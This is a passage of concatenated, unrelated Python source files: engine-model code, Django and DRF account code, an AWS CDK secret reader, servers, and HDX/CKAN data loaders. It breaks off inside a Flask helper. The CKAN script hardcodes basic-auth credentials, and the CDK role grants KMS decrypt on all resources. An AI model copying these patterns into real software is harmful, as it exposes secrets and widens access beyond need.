    #     prob.model.connect('DESIGN.fan.s_PRdes', pt+'.fan.s_PRdes')
    #     prob.model.connect('DESIGN.fan.s_WcDes', pt+'.fan.s_WcDes')
    #     prob.model.connect('DESIGN.fan.s_effDes', pt+'.fan.s_effDes')
    #     prob.model.connect('DESIGN.fan.s_NcDes', pt+'.fan.s_NcDes')
    #     prob.model.connect('DESIGN.lpc.s_PRdes', pt+'.lpc.s_PRdes')
    #     prob.model.connect('DESIGN.lpc.s_WcDes', pt+'.lpc.s_WcDes')
    #     prob.model.connect('DESIGN.lpc.s_effDes', pt+'.lpc.s_effDes')
    #     prob.model.connect('DESIGN.lpc.s_NcDes', pt+'.lpc.s_NcDes')
    #     prob.model.connect('DESIGN.hpc.s_PRdes', pt+'.hpc.s_PRdes')
    #     prob.model.connect('DESIGN.hpc.s_WcDes', pt+'.hpc.s_WcDes')
    #     prob.model.connect('DESIGN.hpc.s_effDes', pt+'.hpc.s_effDes')
    #     prob.model.connect('DESIGN.hpc.s_NcDes', pt+'.hpc.s_NcDes')
    #     prob.model.connect('DESIGN.hpt.s_PRdes', pt+'.hpt.s_PRdes')
    #     prob.model.connect('DESIGN.hpt.s_WpDes', pt+'.hpt.s_WpDes')
    #     prob.model.connect('DESIGN.hpt.s_effDes', pt+'.hpt.s_effDes')
    #     prob.model.connect('DESIGN.hpt.s_NpDes', pt+'.hpt.s_NpDes')
    #     prob.model.connect('DESIGN.lpt.s_PRdes', pt+'.lpt.s_PRdes')
    #     prob.model.connect('DESIGN.lpt.s_WpDes', pt+'.lpt.s_WpDes')
    #     prob.model.connect('DESIGN.lpt.s_effDes', pt+'.lpt.s_effDes')
    #     prob.model.connect('DESIGN.lpt.s_NpDes', pt+'.lpt.s_NpDes')
    #     prob.model.connect('DESIGN.nozzle.Throat:stat:area',pt+'.core_flow_balance.rhs')
    #     prob.model.connect('DESIGN.inlet.Fl_O:stat:area', pt+'.inlet.area')
    #     prob.model.connect('DESIGN.fan.Fl_O:stat:area', pt+'.fan.area')
    #     prob.model.connect('DESIGN.splitter.Fl_O1:stat:area', pt+'.splitter.area1')
    #     prob.model.connect('DESIGN.splitter.Fl_O2:stat:area', pt+'.splitter.area2')
    #     prob.model.connect('DESIGN.duct4.Fl_O:stat:area', pt+'.duct4.area')
    #     prob.model.connect('DESIGN.lpc.Fl_O:stat:area', pt+'.lpc.area')
    #     prob.model.connect('DESIGN.duct6.Fl_O:stat:area', pt+'.duct6.area')
    #     prob.model.connect('DESIGN.hpc.Fl_O:stat:area', pt+'.hpc.area')
    #     prob.model.connect('DESIGN.bld3.Fl_O:stat:area', pt+'.bld3.area')
    #     prob.model.connect('DESIGN.burner.Fl_O:stat:area', pt+'.burner.area')
    #     prob.model.connect('DESIGN.hpt.Fl_O:stat:area', pt+'.hpt.area')
    #     prob.model.connect('DESIGN.duct11.Fl_O:stat:area', pt+'.duct11.area')
    #     prob.model.connect('DESIGN.lpt.Fl_O:stat:area', pt+'.lpt.area')
    #     prob.model.connect('DESIGN.duct13.Fl_O:stat:area', pt+'.duct13.area')
    #     prob.model.connect('DESIGN.byp_bld.Fl_O:stat:area', pt+'.byp_bld.area')
    #     prob.model.connect('DESIGN.duct15.Fl_O:stat:area', pt+'.duct15.area')
    prob.setup(check=False)
    # initial guesses (seed the Newton solver near the expected solution)
    prob['DESIGN.balance.FAR'] = 0.02261
    prob['DESIGN.balance.W'] = 10.76
    prob['DESIGN.balance.pt_PR'] = 4.939
    prob['DESIGN.balance.lpt_PR'] = 1.979
    prob['DESIGN.balance.hpt_PR'] = 4.236
    prob['DESIGN.fc.balance.Pt'] = 5.666
    prob['DESIGN.fc.balance.Tt'] = 440.0
    # for pt in pts:
    #     prob[pt+'.thrust_balance.indep'] = 0.02467
    #     prob[pt+'.core_flow_balance.indep'] = 320.931
    #     prob[pt+'.byp_flow_balance.indep'] = 5.105
    #     prob[pt+'.lp_shaft_balance.indep'] = 4666.1
    #     prob[pt+'.hp_shaft_balance.indep'] = 14705.7
    #     prob[pt+'.fc.balance.Pt'] = 5.2
    #     prob[pt+'.fc.balance.Tt'] = 440.0
    #     prob[pt+'.hpt.PR'] = 3.6200
    #     prob[pt+'.lpt.PR'] = 4.3645
    #     prob[pt+'.lpc.map.RlineMap'] = 2.0
    #     prob[pt+'.hpc.map.RlineMap'] = 2.0
    # Solve the design point and report each point, timing the whole run.
    st = time.time()
    prob.set_solver_print(level=-1)
    prob.set_solver_print(level=2, depth=1)
    prob.run_model()
    for pt in ['DESIGN']+pts:
        viewer(prob, pt)
    print()
    print("time", time.time() - st)
|
from django.contrib.auth.views import PasswordChangeView
from django.urls import path
from telescope_shop.accounts.views import RegisterUserView, LogoutView, LoginVew, UpdateUserView, \
PasswordsChangeView, DeleteUserView, ProfileDetailsView
# URL routes for the accounts app: registration, authentication, profile
# management, password change and account deletion. The route names are the
# ones referenced by templates and redirects elsewhere in the project.
urlpatterns = [
    path('register/', RegisterUserView.as_view(), name='register'),
    path('update/', UpdateUserView.as_view(), name='update profile'),
    path('login/', LoginVew.as_view(), name='login'),
    path('logout/', LogoutView.as_view(), name='logout'),
    path('profile/', ProfileDetailsView.as_view(), name='profile details'),
    path('password/', PasswordsChangeView.as_view(), name='change password'),
    # Deletion takes the profile primary key, unlike the session-based routes.
    path('delete/<int:pk>/', DeleteUserView.as_view(), name='delete profile'),
]
|
from .base_action import BaseAction
class Communication(BaseAction):
    """Marker action type for communication items; all behavior comes from BaseAction."""
    pass
class Integrations(BaseAction):
    """Marker action type for integration items; all behavior comes from BaseAction."""
    pass
class Workshops(BaseAction):
    """Marker action type for workshop items; all behavior comes from BaseAction."""
    pass
|
def encode(num, return_type="int"):
    """Encode a non-negative integer as a base-128 varint.

    The value is emitted least-significant group first, seven bits per byte,
    with the high bit set on every byte except the last (LEB128 / protobuf
    varint layout).

    Args:
        num: non-negative integer to encode.
        return_type: "int" (default) returns a list of ints; "hex" returns
            a list of two-character lowercase hex strings.

    Returns:
        List of byte values (ints or hex strings).

    Raises:
        ValueError: if num is negative. (In Python, ``num >> 7`` on a
            negative int never reaches zero, so the original loop would
            never terminate.)
    """
    if num < 0:
        raise ValueError("varint encoding is only defined for non-negative integers")
    out = []
    while True:
        # Take the low seven bits of the remaining value.
        first_seven = num & 0x7f
        num = num >> 7
        if num:
            # More bytes follow: set the continuation (most significant) bit.
            out.append(first_seven | 0x80)
        else:
            # Last byte: continuation bit stays clear.
            out.append(first_seven)
            break
    if return_type == "hex":
        # format(b, '02x') == hex(b)[2:].zfill(2) for values 0..255.
        out = [format(byte, '02x') for byte in out]
    return out
|
from aws_cdk import (
aws_iam as iam,
aws_lambda as lambda_,
aws_secretsmanager as sm,
custom_resources as cr,
core
)
class SecretReader(lambda_.Function):
    """Lambda-backed CDK custom resource that resolves a Secrets Manager value.

    Deploys a Python 3.8 handler, grants it access to the target secret (plus
    KMS decrypt), wires it up as a CloudFormation custom-resource provider,
    and exposes the resolved value as ``self.secret_value``.
    """

    # NOTE(review): unused within this class — presumably consumed by
    # subclasses or callers; confirm before removing.
    prefix = 'EcoStruxure'

    def __init__(
        self, scope: core.Construct, id: str,
        secret: sm.Secret,
        attribute_name: str = None) -> None:
        """Create the reader.

        Args:
            scope: parent construct.
            id: construct id; also used to derive the provider/CR ids.
            secret: the secret whose value should be read.
            attribute_name: optional key within the secret to extract;
                handled by the Lambda handler code.
        """
        super(SecretReader, self).__init__(
            scope=scope,
            id=id,
            runtime=lambda_.Runtime.PYTHON_3_8,
            code=lambda_.Code.from_asset('./cdk/l3_constructs/secrets_manager/SecretReaderCR'),
            handler='index.handler'
        )
        # Scope secret access to the single target secret.
        self.add_to_role_policy(iam.PolicyStatement(
            effect=iam.Effect.ALLOW,
            actions=[
                'secretsmanager:DescribeSecret',
                'secretsmanager:GetSecretValue',
                'secretsmanager:RotateSecret',
                'secretsmanager:UpdateSecretVersionStage',
                'secretsmanager:PutSecretValue'
            ],
            resources=[secret.secret_arn]
        ))
        # KMS decrypt is granted broadly ('*') — the secret's CMK ARN is not
        # known here; NOTE(review): consider narrowing to the secret's key.
        self.add_to_role_policy(iam.PolicyStatement(
            effect=iam.Effect.ALLOW,
            actions=[
                'kms:Decrypt'
            ],
            resources=['*']
        ))
        # This Lambda itself serves as the custom-resource event handler.
        provider = cr.Provider(
            self, f'{id}Provider',
            on_event_handler=self
        )
        custom_resource = core.CustomResource(
            self, f'{id}CR',
            service_token=provider.service_token,
            properties={
                "SecretArn": secret.secret_arn,
                # Falsy attribute names (e.g. '') are normalized to None.
                "AttributeName": attribute_name or None
            }
        )
        # Token that resolves to the secret's value at deploy time.
        self.secret_value = custom_resource.get_att_string('SecretValue')
|
from setuptools import setup, find_packages
# Package metadata kept in one place so it can be reused programmatically.
INFO = {'name': 'Robot Brain',
        'version': '0.2.0',
        }

# Minimal setuptools configuration; packages are discovered automatically.
setup(
    name = INFO['name'],
    version = INFO['version'],
    author = 'Jack Minardi',
    packages = find_packages(),
    zip_safe = False,
    maintainer = 'Jack Minardi',
    maintainer_email = 'jack@minardi.org',
    platforms = ["Linux"],
)
|
import socketio
import eventlet
from typing import Text, List
from app.config import Config
from app.logging import logger
from app.services import S3Service, GoogleSpeechService
# Socket.IO server wired for eventlet, with binary payload support and
# permissive CORS; a minimal static client is served under /static.
manager = socketio.BaseManager()
sio = socketio.Server(async_mode='eventlet', client_manager=manager, binary=True, cors_allowed_origins='*')
app = socketio.WSGIApp(sio, static_files={'/static': './app/ws/static/index.html'})

# Shared service singletons used by all event handlers below.
s3_service = S3Service()
speech_service = GoogleSpeechService()
@sio.event
def connect(sid: Text, environ) -> None:
    """On client connect, push the full list of stored results to everyone."""
    logger.info(f"[{sid}]connected")
    send_all()
@sio.event
def disconnect(sid) -> None:
    """Log client disconnects; no cleanup is required."""
    logger.info(f"[{sid}]disconnected")
@sio.event
def voice_message(sid: Text, data: List[bytes]) -> None:
    """Store an uploaded voice message, transcribe it, and broadcast the result."""
    logger.info(f"[{sid}]received voice message")
    # Persist the raw audio locally, normalize its format, then upload to S3.
    file_path = s3_service.save_to_tmp(data)
    file_path = s3_service.convert(file_path)
    key = s3_service.upload(file_path)
    result = s3_service.store_to_db(key)
    url = s3_service.get_pre_signed_url(key)
    # Transcription reads the local converted file, not the S3 copy.
    texts = speech_service.to_text(str(file_path.resolve()))
    logger.info(f"[{sid}] result:{texts}")
    # Attach the transcript to the DB record before announcing it.
    result.text = texts
    s3_service.save(result)
    sio.emit("send_result", {"id": result.id, "url": url, "texts": texts})
@sio.event
def message(sid: Text, data: Text) -> None:
    """Log plain text messages; they are not processed further."""
    logger.info(f"[{sid}]received message:{data}")
@sio.event
def delete_result(sid: Text, result_id: Text) -> None:
    """Delete a stored result and re-broadcast the updated list to all clients."""
    logger.info(f"[{sid}]received delete message:{result_id}")
    s3_service.delete(result_id)
    send_all()
def send_all():
    """Broadcast every stored result, each with a fresh pre-signed URL, to all clients."""
    records = s3_service.get_all_from_db()
    logger.info(f"data size is {len(records)}")
    payload = [
        {
            "id": record.id,
            "url": s3_service.get_pre_signed_url(record.audio_key),
            "texts": record.text,
        }
        for record in records
    ]
    sio.emit("send_results", payload)
def run_server():
    """Start the blocking eventlet WSGI server on the configured port."""
    eventlet.wsgi.server(eventlet.listen(('', Config.WS_PORT)), app, log=logger)
|
#!/usr/bin/env python
import os
import errno
import IPython.html
import shutil
import urllib
from jinja2 import Environment
from jinja2 import FileSystemLoader
from install_lib import COLAB_ROOT_PATH
from install_lib import pjoin
from install_lib import CopyTreeRecursively
from install_lib import MakeDirectoryIfNotExist
from install_lib import RemoveDirectoryIfExist
from install_lib import RemoveFileIfExist
from install_lib import RemoveFileOrDirectoryIfExist
def BundleStatic(colab_root, dest, extra_template_args=None):
    """Stage all static assets for colaboratory into *dest*.

    Copies the colab/extern assets, IPython's static files (plus local
    patches), the closure library submodule, and renders the welcome/notebook
    HTML templates. Existing staged directories in *dest* are removed first.

    Args:
        colab_root: repository root containing colaboratory resources.
        dest: output directory (created if missing).
        extra_template_args: optional dict merged over the default Jinja2
            template arguments.
    """
    # Use the following default arguments for template rendering.
    template_args = {
        'raw': '1',
        'app_mode': False
    }
    if extra_template_args is not None:
        template_args.update(extra_template_args)
    # prepare the destination directory
    MakeDirectoryIfNotExist(dest)
    for d in ['colab', 'extern', 'ipython', 'closure', 'welcome', 'notebook']:
        RemoveDirectoryIfExist(pjoin(dest, d))
    ipython_static = IPython.html.DEFAULT_STATIC_FILES_PATH
    colab_resources = pjoin(colab_root, 'colaboratory', 'resources')
    colab_static = pjoin(colab_root, 'static')
    closure = pjoin(colab_resources, 'closure-library', 'closure', 'goog')
    # TODO: run git submodule init && git submodule update in COLAB_ROOT_PATH
    # stage the basic colab and extern directories
    CopyTreeRecursively(pjoin(colab_resources, 'colab'), pjoin(dest, 'colab'))
    CopyTreeRecursively(pjoin(colab_resources, 'extern'), pjoin(dest, 'extern'))
    # stage IPython's static files, then clobber them with patched versions
    CopyTreeRecursively(ipython_static, pjoin(dest, 'ipython'))
    # Drop the .git metadata that ships inside IPython's components tree.
    RemoveFileOrDirectoryIfExist(pjoin(dest, 'ipython', 'components', '.git'))
    CopyTreeRecursively(pjoin(colab_resources, 'ipython_patch'), pjoin(dest, 'ipython'))
    # stage closure from the submodule
    CopyTreeRecursively(closure, pjoin(dest, 'closure'))
    # instantiate templates and stage the /, /welcome/, and /notebook/ URLs
    template_path = os.path.join(colab_resources, "colab")
    env = Environment(loader=FileSystemLoader(template_path))
    CopyTreeRecursively(colab_static, pjoin(dest, 'static'))
    for name in ['welcome', 'notebook']:
        template = env.get_template(name + os.extsep + 'html');
        # Each page is written twice: as <name>/index.html and colab/<name>.html.
        for d in [pjoin(dest, name, 'index' + os.extsep + 'html'), pjoin(dest, 'colab', name + os.extsep + 'html')]:
            path, filename = os.path.split(d)
            MakeDirectoryIfNotExist(path)
            with open(d, 'w') as f:
                f.write(template.render(template_args))
if __name__ == '__main__':
    import sys
    # Destination is the first CLI argument; default to <colab root>/build.
    dest = sys.argv[1] if len(sys.argv) >= 2 else pjoin(COLAB_ROOT_PATH, 'build')
    BundleStatic(COLAB_ROOT_PATH, dest)
|
# NOTE(review): this module appears intentionally broken — `dne` is not an
# importable module and `fob` is an undefined name. It looks like a fixture
# for exercising import/NameError handling; confirm before "fixing" it.
import dne
fob
|
from decimal import Decimal, getcontext

# Demonstration that Decimal arithmetic at 20 significant digits behaves
# associatively/distributively on examples where binary floats would not.
getcontext().prec = 20

# Associativity of addition: both groupings print the same value.
u, v, w = Decimal(11111113), Decimal(-11111111), Decimal('7.51111111')
print((u + v) + w)
print(u + (v + w))

# Distributivity: u*v + u*w equals u*(v + w).
u, v, w = Decimal(20000), Decimal(-6), Decimal('6.0000003')
print((u*v) + (u*w))
print(u * (v+w))
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import csv
import sys
import json
import ckanapi
import requests
import scraperwiki
def FetchSystemArguments():
'''Fetching arguments from the command line interface.'''
arguments = {
'api_key': sys.argv[1],
'json_path': sys.argv[2],
'download_temp_path': sys.argv[3],
'stag_url': 'https://test-data.hdx.rwlabs.org',
'prod_url': 'https://data.hdx.rwlabs.org'
}
#
# Checking that all arguments have been provided.
#
for argument in arguments:
if argument is None:
print 'Argument %s is empty. That argument is necessary.' % argument.keys()
return False
return arguments
def GetResourcesFromLocalJSON(local_json_path):
'''Loading resources from a local json file.'''
try:
with open(local_json_path) as json_file:
resources = json.load(json_file)
#
# Checking that the json provide contains at least
# one resource.
#
if len(resources) < 1:
print "Resouces look odd! Please revise"
return resources
except Exception as e:
print e
return False
def DownloadResourceFromHDX(ckan_url, file_name, resource_id, api_key, verbose = True):
'''Downloading a resource from CKAN based on its id. Resources need to be
downloaded in order to be correctly parsed by the CreateDatastore function.'''
print "Downloading resource file from HDX."
header = { 'Authorization': api_key }
#
# Querying.
#
url = ckan_url + '/api/action/resource_show?id=' + resource_id
r = requests.get(url, headers=header, auth=('dataproject', 'humdata'))
doc = r.json()
if doc['success'] is False:
if verbose:
print json.dumps(doc)
print 'Failed to read resource.'
return False
else:
resource_file_url = doc["result"]["url"]
#
# Downloading.
#
try:
with open(file_name, 'wb') as handle:
response = requests.get(resource_file_url, stream=True, headers=header, auth=('dataproject', 'humdata'))
if not response.ok:
print "Error: attempt to download resource failed."
return
for block in response.iter_content(1024):
if not block:
break
handle.write(block)
except Exception as e:
print 'There was an error downlaoding the file.'
if verbose:
print e
return False
def DeleteDatastore(ckan_url, api_key, ckan_resource_id, verbose=True):
    '''Delete a CKAN DataStore.

    Best-effort: failures (e.g. the DataStore does not exist yet) are only
    warned about, never raised. Always returns None.'''
    #
    # Configuring the remote CKAN instance.
    #
    ckan = ckanapi.RemoteCKAN(ckan_url, apikey=api_key)
    try:
        ckan.action.datastore_delete(resource_id=ckan_resource_id, force=True)
    except Exception as e:
        # Deliberately swallowed: deleting a missing DataStore is expected
        # on a first run for a resource.
        print 'WARN: There was an error deleting an old DataStore.'
        if verbose:
            print e
        pass
def CreateDatastore(ckan_url, api_key, resource_id, file_name, resource, verbose=True):
    '''Create a CKAN DataStore for *resource_id* and load the downloaded CSV
    (*file_name*) into it in chunks.'''
    #
    # Configuring the remote CKAN instance.
    #
    ckan = ckanapi.RemoteCKAN(ckan_url, apikey=api_key)
    #
    # Dropping any pre-existing DataStore for this resource.
    # BUG FIX: DeleteDatastore was previously called twice back-to-back;
    # once is enough. It is best-effort and always returns None, so the old
    # `is False` check could never trigger and has been removed.
    #
    DeleteDatastore(ckan_url=ckan_url, api_key=api_key, ckan_resource_id=resource_id)
    #
    # Creating a DataStore with the schema declared in the resource entry.
    #
    ckan.action.datastore_create(
        resource_id=resource_id,
        force=True,
        fields=resource['schema']['fields'],
        primary_key=resource['schema'].get('primary_key'))
    #
    # Reading CSV file and inserting data.
    #
    reader = csv.DictReader(open(file_name))
    rows = [ row for row in reader ]
    #
    # Hack for managing different encoding data (Python 2 str -> unicode).
    #
    rows_decoded = []
    for row in rows:
        row_encoded = { key:row[key].decode('latin-1') for key in row.keys() }
        rows_decoded.append(row_encoded)
    #
    # Sending N records at a time.
    #
    chunksize = 10000  # N rows per POST request.
    offset = 0
    while offset < len(rows_decoded):
        rowset = rows_decoded[offset:offset+chunksize]
        ckan.action.datastore_upsert(
            resource_id=resource_id,
            force=True,
            method='insert',
            records=rowset)
        offset += chunksize
        complete = str(float(offset)/len(rows_decoded) * 100)[:4] + '%'
        print(' Update successful: %s completed' % complete)
def Main():
'''Wrapper.'''
#
# Fetching arguments and configuring the script.
#
p = FetchSystemArguments()
api_key = p['api_key']
ckan_url = p['prod_url']
download_temp_path = p['download_temp_path']
#
# Loading resources from a local JSON file.
#
resources = GetResourcesFromLocalJSON(p['json_path'])
#
# Iterating over each resource provided.
#
for r in resources:
resource_id = r['resource_id']
print 'Creating DataStore for resource id: ' + resource_id
try:
DownloadResourceFromHDX(
ckan_url=ckan_url,
file_name=download_temp_path,
resource_id=resource_id,
api_key=api_key
)
CreateDatastore(
ckan_url=ckan_url,
api_key=api_key,
file_name=download_temp_path,
resource_id=resource_id,
resource=r
)
print 'All DataStores were created successfully.'
except Exception as e:
print 'DataStore creation failed.'
print e
return False
# Script entry point.
if __name__ == '__main__':
    Main()
|
from rest_framework import serializers
from .models import UserProfile
from allauth.account.adapter import get_adapter
from rest_auth.registration import serializers as RegisterSerializer
from roboPortal.models import portalUser
class UserProfileSerializer(serializers.ModelSerializer, RegisterSerializer.RegisterSerializer):
    """Registration serializer for UserProfile.

    Accepts a password plus confirmation (``password1``), validates that the
    two match, creates the user and attaches an empty portalUser record.

    NOTE(review): the original class body also declared an ``extra_kwargs``
    dict directly on the class; DRF only reads ``extra_kwargs`` from ``Meta``,
    so that duplicate was dead code and has been removed.
    """
    # Password confirmation; write-only so it is never echoed in responses.
    password1 = serializers.CharField(write_only=True)
    class Meta:
        model = UserProfile
        fields = ('email','name','phone_no','password','password1')
        extra_kwargs = {
            'password' : {
                'write_only':True,
                'style':{'input_type':'password'}
            },
            'password1' : {
                'write_only':True,
                'style':{'input_type':'password'}
            }
        }
    def validate(self, data):
        """Reject the payload when the two password fields differ."""
        if data['password'] != data['password1']:
            raise serializers.ValidationError(("The two password fields didn't match."))
        return data
    def create(self,validated_data):
        """Create the user and its associated portalUser row."""
        user = UserProfile.objects.create_user(
            email = validated_data.get('email'),
            name = validated_data.get('name'),
            phone_no = validated_data.get('phone_no'),
            password = validated_data.get('password')
        )
        a= portalUser(user = user)
        a.save()
        return user
    def get_cleaned_data(self):
        """Extend allauth's cleaned data with the extra profile fields."""
        data_dict = super().get_cleaned_data()
        data_dict['name'] = self.validated_data.get('name')
        data_dict['phone_no'] = self.validated_data.get('phone_no')
        return data_dict
class UserDetailsSerializer(serializers.ModelSerializer):
    """Serializer exposing a user's own profile details.

    ``email`` is read-only so the account identifier cannot be changed
    through this endpoint.
    """
    class Meta:
        model = UserProfile
        # fields = '__all__'
        fields = ('id','email','name','phone_no')
        read_only_fields = ('email',)
class UserDetailsTeamSerializer(serializers.ModelSerializer):
    """Minimal read-only serializer: exposes only the member's name
    (e.g. for team listings where no other detail should leak).
    """
    class Meta:
        model = UserProfile
        # fields = '__all__'
        fields = ('name',)
        read_only_fields = ('name',)
|
# -*- encoding=utf-8 -*-
"""
# **********************************************************************************
# Copyright (c) Huawei Technologies Co., Ltd. 2020-2020. All rights reserved.
# [oecp] is licensed under the Mulan PSL v1.
# You can use this software according to the terms and conditions of the Mulan PSL v1.
# You may obtain a copy of Mulan PSL v1 at:
# http://license.coscl.org.cn/MulanPSL
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR
# PURPOSE.
# See the Mulan PSL v1 for more details.
# Author:
# Create: 2021-09-03
# Description: repository
# **********************************************************************************
"""
import os
import logging
from collections import UserDict
import tempfile
import weakref
from oecp.utils.misc import path_is_remote, basename_of_path
from oecp.proxy.requests_proxy import do_download
from oecp.proxy.rpm_proxy import RPMProxy
from oecp.result.compare_result import *
logger = logging.getLogger("oecp")
class Repository(UserDict):
    """
    A repository composed of multiple rpm packages, keyed by binary rpm name.
    """
    def __init__(self, work_dir, name, category=None):
        """
        :param work_dir: working directory
        :param name: repository name
        :param category: category helper used to classify packages
        """
        super(Repository, self).__init__()
        self._work_dir = work_dir
        self._download_dir = None  # local download path when packages are remote; delete the attribute when no longer needed to free disk space
        self._name = RPMProxy.rpm_name(name)
        self.verbose_path = name
        self._category = category
        self._category_level = category.category_of_src_package(self._name)
    @property
    def work_dir(self):
        # Working directory handed in at construction time.
        return self._work_dir
    def upsert_a_rpm(self, path, verbose_path, debuginfo_path=None):
        """
        Add (or replace) one rpm package entry.
        :param path: full path of the package
        :param verbose_path: display path of the package
        :param debuginfo_path: full path of the matching debuginfo package
        :return:
        """
        name = RPMProxy.rpm_name(basename_of_path(verbose_path))
        category_level = self._category.category_of_bin_package(name)
        logger.debug(f"repo {self._name} upsert a rpm, name: {name}, "
                     f"path: {path}, debuginfo_path: {debuginfo_path}, level: {category_level}")
        # "raw_path"/"raw_debuginfo_path" keep the original (possibly remote)
        # locations; "path"/"debuginfo_path" may later be rewritten to local
        # copies by __getitem__.
        rpm = {
            "name": name,
            "category": category_level,
            "path": path,
            "verbose_path": verbose_path,
            "raw_path": path,
            "debuginfo_path": debuginfo_path,
            "raw_debuginfo_path": debuginfo_path
        }
        self[name] = rpm
    @property
    def download_dir(self):
        # Lazily create a temporary download directory under the work dir.
        if self._download_dir is None:
            self._download_dir = tempfile.TemporaryDirectory(prefix="repo_", suffix=f"_{self._name}", dir=self._work_dir)
        return self._download_dir.name
    @download_dir.setter
    def download_dir(self, path):
        self._download_dir = path
    @download_dir.deleter
    def download_dir(self):
        """
        Free the disk space occupied by downloaded packages.
        :return:
        """
        # Dropping the reference lets TemporaryDirectory's finalizer
        # remove the files.
        self._download_dir = None
    def __getitem__(self, item):
        """
        When an rpm's path points at a remote location, the download
        happens here, lazily, on first access.
        :param item:
        :return:
        """
        rpm = super(Repository, self).__getitem__(item)
        # download the rpm lazily
        path = rpm.get("path")
        if path_is_remote(path):
            local_path = os.path.join(self.download_dir, basename_of_path(path))
            do_download(path, local_path)
            rpm["path"] = local_path
        # download the debuginfo rpm lazily
        debuginfo_path = rpm.get("debuginfo_path")
        if path_is_remote(debuginfo_path):
            local_path = os.path.join(self.download_dir, basename_of_path(debuginfo_path))
            do_download(debuginfo_path, local_path)
            rpm["debuginfo_path"] = local_path
        return rpm
    def clean(self):
        """
        Release the downloaded packages (resets the download directory).
        :return:
        """
        self.download_dir = None
    def compare(self, that, plan):
        """
        Run the comparison.
        :param that: the other side of the comparison
        :param plan: the comparison plan
        :return: composite comparison result
        """
        result = CompareResultComposite(
            CMP_TYPE_REPOSITORY, CMP_RESULT_TO_BE_DETERMINED, self.verbose_path, that.verbose_path)
        # Comparison items can depend on each other, so config/dumper/executor
        # are cached and passed along, indexed by the comparison item name:
        # {"plan_name": {"config": config, "dumper": {"this": this_dumper, "that": that_dumper}, "executor": executor}}
        compare_cache = {}
        try:
            for name in plan:
                if plan.only_for_directory(name):
                    logger.debug(f"ignore plan.{name} for repository")
                    continue
                if plan.check_specific_package(name, self._name):
                    logger.debug(f"plan.{name} not support {self._name}")
                    continue
                if plan.check_specific_category(name, self._category_level):
                    logger.debug(f"plan.{name} not support {self._category_level}")
                    continue
                logger.info(f"Analysis repo {self._name} [{name}]")
                # get dumper, executor, config
                dumper = plan.dumper_of(name)
                executor = plan.executor_of(name)
                config = plan.config_of(name)
                compare_cache.setdefault(name, {})
                this_dumper, that_dumper = dumper(self, compare_cache, config), dumper(that, compare_cache, config)
                executor_ins = executor(this_dumper, that_dumper, config)
                # set cache
                compare_cache[name]["dumper"] = [this_dumper, that_dumper]
                compare_cache[name]["work_dir"] = self._work_dir
                # compare_cache[name]["executor"] = weakref.proxy(executor_ins)
                result.add_component(*executor_ins.run())
        # clean cache for tempfile
        finally:
            for _, dumpers in compare_cache.items():
                for dumper in dumpers.get('dumper', []):
                    dumper.clean()
        result.set_cmp_result()
        return result
    def find_sensitive_str(self, plan):
        """
        Run the sensitive-string search.
        :param plan: the search plan
        :return: list of per-item results
        """
        result = []
        # Comparison items can depend on each other, so config/dumper/executor
        # are cached and passed along, indexed by the comparison item name:
        # {"plan_name": {"config": config, "dumper": {"this": this_dumper, "that": that_dumper}, "executor": executor}}
        compare_cache = {}
        try:
            for name in plan:
                if not plan.check_sensitive_str(name):
                    logger.debug(f"plan.{name} not support {self._name}")
                    continue
                logger.info(f"Analysis repo {self._name} [{name}]")
                # get dumper, executor, config
                dumper = plan.dumper_of(name)
                executor = plan.executor_of(name)
                config = plan.config_of(name)
                compare_cache.setdefault(name, {})
                this_dumper = dumper(self, compare_cache, config)
                executor_ins = executor(this_dumper, config)
                # set cache
                compare_cache[name]["dumper"] = [this_dumper]
                compare_cache[name]["work_dir"] = self._work_dir
                # compare_cache[name]["executor"] = weakref.proxy(executor_ins)
                res = executor_ins.run()
                result.append(res)
        # clean cache for tempfile
        finally:
            for _, dumpers in compare_cache.items():
                for dumper in dumpers.get('dumper', []):
                    dumper.clean()
        return result
    def find_sensitive_image(self, plan):
        """
        Run the sensitive-image search.
        :param plan: the search plan
        :return: list of per-item results
        """
        result = []
        # Comparison items can depend on each other, so config/dumper/executor
        # are cached and passed along, indexed by the comparison item name:
        # {"plan_name": {"config": config, "dumper": {"this": this_dumper, "that": that_dumper}, "executor": executor}}
        compare_cache = {}
        try:
            for name in plan:
                if not plan.check_sensitive_image(name):
                    logger.debug(f"plan.{name} not support {self._name}")
                    continue
                logger.info(f"compare repo {self._name} [{name}]")
                # get dumper, executor, config
                dumper = plan.dumper_of(name)
                executor = plan.executor_of(name)
                config = plan.config_of(name)
                compare_cache.setdefault(name, {})
                this_dumper = dumper(self, compare_cache, config)
                executor_ins = executor(this_dumper, config)
                # set cache
                compare_cache[name]["dumper"] = [this_dumper]
                compare_cache[name]["work_dir"] = self._work_dir
                # compare_cache[name]["executor"] = weakref.proxy(executor_ins)
                res = executor_ins.run()
                result.append(res)
        # clean cache for tempfile
        finally:
            for _, dumpers in compare_cache.items():
                for dumper in dumpers.get('dumper', []):
                    dumper.clean()
        return result
|
import os, sys, time, json, yaml, uuid
import redis
import torch
import numpy as np
from PIL import Image
from werkzeug.utils import secure_filename
from flask import Flask, request, flash, jsonify
mlpipe_root = os.path.abspath("../..")
# sys.path.insert(1, os.path.join(sys.path[0], mlpipe_root)
sys.path.insert(0, mlpipe_root)
# for p in sys.path:
# print(p + "\n")
# print(mlpipe_root)
from config.clistyle import bcolor
from servers.helpers.helperfunctions import base64_encoding, get_dtype
# Preprocessing specific
from torchvision import transforms
# Load the global settings once at import time.
with open(mlpipe_root + "/config/settings.yaml", 'r') as stream:
    try:
        # safe_load avoids arbitrary Python object construction from the YAML
        # file (plain yaml.load without an explicit Loader is deprecated and
        # unsafe on untrusted input).
        settings = yaml.safe_load(stream)
    except yaml.YAMLError as exc:
        print(exc)
# TBD after merge
# with open("./config/allowedExtns.yaml", 'r') as stream:
#     try:
#         allowed_extensions = yaml.load(stream)
#     except yaml.YAMLError as exc:
#         print(exc)
app = Flask(__name__)
# Redis connection shared by all request handlers (used as a work queue).
rdb = redis.StrictRedis(
    host=settings['redis']['host'],
    port=settings['redis']['port'],
    db=settings['redis']['db']
)
# rdb.flushall()
def allowed_file(filename):
    """Return True when *filename* carries an extension from the allow-list.

    The allow-list comes from ``settings['data_stream']['allowed_extensions']``.
    """
